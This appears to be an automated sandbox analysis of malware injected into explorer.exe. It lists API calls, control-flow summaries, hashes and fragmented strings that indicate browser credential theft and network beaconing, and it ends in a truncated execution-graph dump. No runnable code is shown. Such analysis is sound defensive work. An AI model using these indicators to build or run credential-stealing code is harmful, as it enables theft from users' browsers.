• Graph summary (rendered graph not preserved): function e750f82, basic blocks e750f82 through e751920; API calls getaddrinfo (block e751117-e751132) and setsockopt, recv (block e7517f4-e751861); internal calls include e74d5b2 (the socket wrapper), e74d732 (the connect wrapper), e74d6b2 (the send wrapper), e750942, e74d552, e751d62, e752262, e752002, e74e482, e74de72, e74e042, e751d92, e74d382 and e74d7b2.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: getaddrinforecvsetsockopt
                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                  • API String ID: 1564272048-1117930895
                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction ID: 35ddd22bcd014fafffd269a39859dfe4f3aa016b77df49c8d7a3e9fab93c74bc
                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction Fuzzy Hash: B152A232614B488FCB29EF68D4947E9B7E1FB54300F904A6EC89FC7266DE70A945CB41

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e750232, basic blocks e750232 through e7508cd; API call NtCreateFile (block e750410-e750458); internal calls to e750942 (repeated), e750172 and e751e92.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: `
                                  • API String ID: 823142352-2679148245
                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction ID: 360e58e6e8556ff289f17175ed669ac9ae803bbcea4015e456e74021fd45d942
                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction Fuzzy Hash: E8223C71A18A099FCB59DF28C4997AEF7E1FB98301F40462ED85ED3260DB70E951CB81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e751e12, single block e751e12-e751e6e calling e750942 and then NtProtectVirtualMemory, branching to exits e751e70-e751e7c and e751e7d-e751e8f.
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 0E751E67
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction ID: 28f3d96e66530e10eb032da98c00e1011de9b48d75386bc02951816b1ed25595
                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction Fuzzy Hash: 7401B135628B884F9B88EF6CD48422AB7E4FBCD315F000B3EE99AC3254EB70C9414742

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e751e0a; blocks e751e0a-e751e38, e751e40 (call e750942) and e751e45-e751e6e (NtProtectVirtualMemory), with exits e751e70-e751e7c and e751e7d-e751e8f.
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 0E751E67
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction ID: eaf5e4ff1b344f41a3d3469929e0b66ff82aa1094db6eaae92e7141298ca19ad
                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction Fuzzy Hash: D501A235628B884B9B48EF2C94452A6B3E5FBCE315F400B3EE99AC3251DB61D9024782

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0E74B9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: f651159ad7eac4fbe9067348976ae50b5f53b6d73c11f73b9c4e1885c93c2037
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: 3131D171614A4C8FCB04EFA8C8887EDB7E0FB58215F40062AD84ED7360DF748A45C789

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0E74B9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 2b787f9d178f4e135767d4ae7a63af1e6dc5aedab8d2b1e9c99b4a6bd8b99f89
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 3F21C371614A4C8ECB05EFA8C8487EDBBF0FF58205F40461AD85AD7360DF748A05CB85

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e747b66, basic blocks e747b66 through e747cf6; API call CreateMutexExW (block e747cb5-e747cca); internal calls to e74e612, e750942 (twice), e752da4, e752022 and e7523e2.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction ID: 65721b459c0f1636471978947ceaa2b523eb1d50fd1d0c4f7e7af856038b19df
                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction Fuzzy Hash: 0B414D71914A088FDB54EFA8C8D8BAD77F0FB58300F44466AC84EDB265DF309945CB85

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction ID: 7dc3aea46c5b6a126d58cf207a4c00ed0df628cc70f60ae8ed762a2af02382dc
                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction Fuzzy Hash: 16412D71918A088FDB54EFA8C8D8BAD77F0FB68300F44456AC84EDB266DF309945CB45

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e74d72e; block e74d76a-e74d782 calls e750942, block e74d788-e74d7ab calls connect.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction ID: f5bcf2f032bebf3e60e4b2b2bc9a54497c85dce1cfb34e0ff7b5fa114e9561fd
                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction Fuzzy Hash: BA014C70618B188FCB94EF1CE088B55B7E0FB58314F1545AAA90DCB226C774C9818BC2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e74d732; block e74d76a-e74d782 calls e750942, block e74d788-e74d7ab calls connect.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction ID: 269f450bf29c79d1cf86f094eed67f80367b3f4c62255983c9903009662b38ce
                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction Fuzzy Hash: 2D012C70618A1C8FCB94EF5CE088B55B7E0FB59314F1545AEA90DCB226CBB4CD818BC2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e74d6b2; block e74d6e7-e74d6ff calls e750942, block e74d705-e74d72d calls send.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: send
                                  • API String ID: 2809346765-2809346765
                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction ID: 765437b8f6d0598a29783015cd9ba06a061a789ede35e9cc58b31817fb7a089c
                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction Fuzzy Hash: AE011270518A188FDB84EF1CD448B25B7E0FB58314F1545AED85DCB266C670D8818B81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e74d5b2; block e74d5ec-e74d604 calls e750942, block e74d60a-e74d62b calls socket.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: sock
                                  • API String ID: 98920635-2415254727
                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction ID: db50188617c1a9a39b265af4bacc5b75353d62aa56f183d1f845d58911e20f3f
                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction Fuzzy Hash: 5C0121706186188FCB84EF1CD048B54BBE0FB59354F1545ADD85ECB27AC7B0C9818B86

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e7452dd, basic blocks e7452dd through e74540e; the entry block calls e750942; block e745328-e745339 calls SleepEx and loops on itself, and later blocks branch back to it; internal calls to e74ff12, e746432, e745e72 and e7450f2.
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction ID: 9ee3c24cd48d46c8d597f7a4bdbcf9dbf277a85f87dc873ec36b8f9854ebc245
                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction Fuzzy Hash: 9C317AB4A14B09DFDB64EF6980882A9F7A0FB44304F44467EC92DCB216CBB49890CFD1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
• Graph summary (rendered graph not preserved): function e745412; the entry block calls e750942; block e745448-e745472 calls e752c9e and then CreateThread; the alternative exit is e745473-e74547d.
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction ID: d4e8181a54b26c3fd0e91384cee12fa55388c43babc85f5cd845775efa4d5ef7
                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction Fuzzy Hash: 67F0F630668A4C4FD788EF2CD44563AF3E0FBE9215F440A3EA94DC7365DA79C9824B16
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction ID: 1ec98a847845995f1e1cdacd35b24cb46692a26f04608835c1e3a98b2b99ddad
                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction Fuzzy Hash: 53E16A74618F488FD764EF68C4947AAB7E0FB98300F404E6E969BC7255DF30A941CB89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                  • API String ID: 0-2916316912
                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction ID: 37374ceb2f96fa384672b10619d0ed927d8a8dd63c4ec0bc00b5fa44e8d9aae1
                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction Fuzzy Hash: EDB19B30618B488EDB54EF68C495AEEB7F1FF98300F50496ED49AC7251EF309909CB86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction ID: c1d2158ea280506966ce0122a6b8b29fbbd1ee57e52c9b33522d2f294bea05dc
                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction Fuzzy Hash: 2241B170A18B088FDB14DF88A4456BEBBE2FBC8700F00065EE409D3296DBB59D458BD6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                  • API String ID: 0-355182820
                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction ID: 814c54563901e1cdccf6ce114798b8cb0217d8cdd3473c98f7d15d4217675f2f
                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction Fuzzy Hash: 7EC17B70218B098FD758EF24C495AEAF3E1FF98304F404B6E959AC7250DF70AA55CB86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction ID: 237a328cfd875d486b88c0a36f0d8d12e5552d78e7e53ede334c0b6295c1aa27
                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction Fuzzy Hash: 5E51E3305187488FE719DF18C8856AAB7E5FBC5300F501EAEE9CBC7251DBB49946CB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction ID: 5c1430887156c404bd6d4aec9b855fdf30e4f304941d0e5c44656c421964d684
                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction Fuzzy Hash: AAC1A070618A1A8FCB58EF68D465AAAF3E1FF98300F554B69950EC7251DF30EE01CB85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$e$n$v
                                  • API String ID: 0-1849617553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4$\$dll$ion.$vers
                                  • API String ID: 0-1610437797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: auth$logi$pass$user
                                  • API String ID: 0-2393853802

                                  Execution Graph

                                  Execution Coverage:1.8%
                                  Dynamic/Decrypted Code Coverage:6.8%
                                  Signature Coverage:0%
                                  Total number of Nodes:619
                                  Total number of Limit Nodes:69
2b3cc00 105979 2b3cc0d 105978->105979 105980 2b3b040 LdrLoadDll 105979->105980 105981 2b3cca9 105979->105981 105980->105981 105982 2b3b040 LdrLoadDll 105981->105982 105983 2b3cd16 105982->105983 105984 2b3af10 LdrLoadDll 105983->105984 105985 2b3cd7f 105984->105985 105986 2b3b040 LdrLoadDll 105985->105986 105987 2b3ce2f 105986->105987 105987->105512 105990 2b38d14 105988->105990 106059 2b3f6d0 105988->106059 106001 2b38f25 105990->106001 106064 2b443a0 105990->106064 105992 2b38d70 105992->106001 106067 2b38ab0 105992->106067 105995 2b4cf00 2 API calls 105996 2b38db2 105995->105996 105997 2b4d030 3 API calls 105996->105997 106002 2b38dc7 105997->106002 105998 2b37ea0 4 API calls 105998->106002 106001->105468 106002->105998 106002->106001 106003 2b3c7b0 18 API calls 106002->106003 106004 2b38160 2 API calls 106002->106004 106073 2b3f670 106002->106073 106077 2b3f080 21 API calls 106002->106077 106003->106002 106004->106002 106005->105486 106006->105509 106007->105937 106009 2b3f2aa 106008->106009 106017 2b3f360 106008->106017 106010 2b3b040 LdrLoadDll 106009->106010 106011 2b3f2cc 106010->106011 106018 2b49f10 106011->106018 106013 2b3f30e 106021 2b49f50 106013->106021 106016 2b4a460 2 API calls 106016->106017 106017->105944 106017->105946 106019 2b4af30 LdrLoadDll 106018->106019 106020 2b49f2c 106019->106020 106020->106013 106022 2b4af30 LdrLoadDll 106021->106022 106023 2b49f6c 106022->106023 106026 4d835c0 LdrInitializeThunk 106023->106026 106024 2b3f354 106024->106016 106026->106024 106028 2b3b2d7 106027->106028 106029 2b3b040 LdrLoadDll 106028->106029 106030 2b3b313 106029->106030 106030->105953 106032 2b3d327 106031->106032 106039 2b3f710 106032->106039 106036 2b3d39b 106037 2b3908b 106036->106037 106050 2b4a270 LdrLoadDll 106036->106050 106037->105978 106040 2b3f735 106039->106040 106051 2b381a0 106040->106051 106042 